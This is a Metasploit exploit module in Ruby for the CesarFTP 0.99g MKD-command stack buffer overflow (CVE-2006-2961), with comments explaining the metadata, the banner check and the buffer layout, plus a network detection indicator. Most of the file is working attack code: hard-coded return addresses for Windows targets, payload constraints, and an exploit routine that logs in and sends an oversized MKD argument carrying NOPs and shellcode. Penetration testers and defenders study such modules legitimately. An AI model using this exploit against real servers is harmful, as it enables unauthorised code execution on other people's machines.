##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the stack buffer overflow in the MKD verb of CesarFTP
# 0.99g (CVE-2006-2961). The overflow is only reachable after a successful
# FTP login, and per the module description a failed attempt is not
# retryable, so the service should be fingerprinted with `check` before
# `exploit` is run.
class MetasploitModule < Msf::Exploit::Remote
  # Average rather than higher: return addresses are hard-coded per target
  # and the description warns there is a single attempt per service instance.
  Rank = AverageRanking

  # Supplies the FTP client helpers used below: connect, connect_login,
  # banner, send_cmd and disconnect.
  include Msf::Exploit::Remote::Ftp

  # Registers module metadata, payload constraints and targets with the
  # framework. No network activity happens here.
  #
  # @param info [Hash] module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
        'Description' => %q{
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.

You must have valid credentials to trigger this vulnerability. Also, you
only get one chance, so choose your target carefully.
},
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2006-2961'],
          [ 'OSVDB', '26364'],
          [ 'BID', '18586'],
          [ 'URL', 'http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/' ],
        ],
        # The module author marks the resulting session as privileged; the
        # service account this implies is not verifiable from the module itself.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          # At most 250 bytes of encoded payload are appended to the buffer
          # built in #exploit.
          'Space' => 250,
          # NUL, space, LF and CR would terminate or split the FTP command
          # line that carries the payload.
          'BadChars' => "\x00\x20\x0a\x0d",
          # Stack pointer adjustment prepended to the payload; presumably so
          # the payload does not overwrite itself while running — see the
          # framework's StackAdjustment handling.
          'StackAdjustment' => -3500,
          'Compat' =>
          {
            'SymbolLookup' => 'ws2ord',
          }
        },
        'Platform' => 'win',
        # One hard-coded 'Ret' per OS / service pack / language build. The
        # inline comments record which DLL an address came from where known;
        # the commented-out entries were superseded by the combined SP2/SP3 one.
        'Targets' => [
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
          [ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ],
          [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
          # [ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
          # [ 'Windows XP SP3 English', { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ],
        ],
        'DisclosureDate' => '2006-06-12',
        'DefaultTarget' => 0,
        # Reliability / stability / side-effect ratings were never filled in
        # for this module; treat them as unassessed rather than benign.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Banner-based vulnerability check. Opens a control connection, closes it,
  # then inspects the banner captured during connect. No MKD command is
  # sent, so the check is non-intrusive.
  #
  # Caveats: a banner is self-reported and can be edited or suppressed, so a
  # match only yields Appears, never Vulnerable. A mismatch — including a nil
  # banner, since `nil =~ regex` is nil — falls through to Safe, which here
  # means "not recognised", not "proven patched".
  #
  # @return [Msf::Exploit::CheckCode] Appears on a CesarFTP 0.99g banner, Safe otherwise
  def check
    connect
    disconnect

    if (banner =~ /CesarFTP 0\.99g/)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Logs in and sends the single oversized MKD argument that triggers the
  # overflow, then hands off to the payload handler.
  #
  # Buffer layout, in order:
  #   671 x "\n"          padding
  #   3 random letters    rand_text_english, filtered through payload_badchars
  #   target.ret          32-bit little-endian (pack('V'))
  #   40 NOPs             make_nops(40)
  #   payload.encoded     at most 250 bytes per 'Space'
  #
  # Detection note: a legitimate MKD argument is a directory name; one that
  # is several hundred bytes long and contains embedded newlines, sent right
  # after a successful login, is a strong on-the-wire indicator of this module.
  def exploit
    # connect_login returns a falsy value when authentication fails, so the
    # overflow is never sent without valid credentials.
    c = connect_login
    return if not c

    sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
    sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded

    print_status("Trying target #{target.name}...")

    # Second argument is the mixin's nowait flag: do not block on a reply,
    # since a server that takes the overflow is not expected to answer.
    send_cmd(['MKD', sploit], false)

    # Wait for the payload's session, then close the FTP control connection.
    handler
    disconnect
  end
end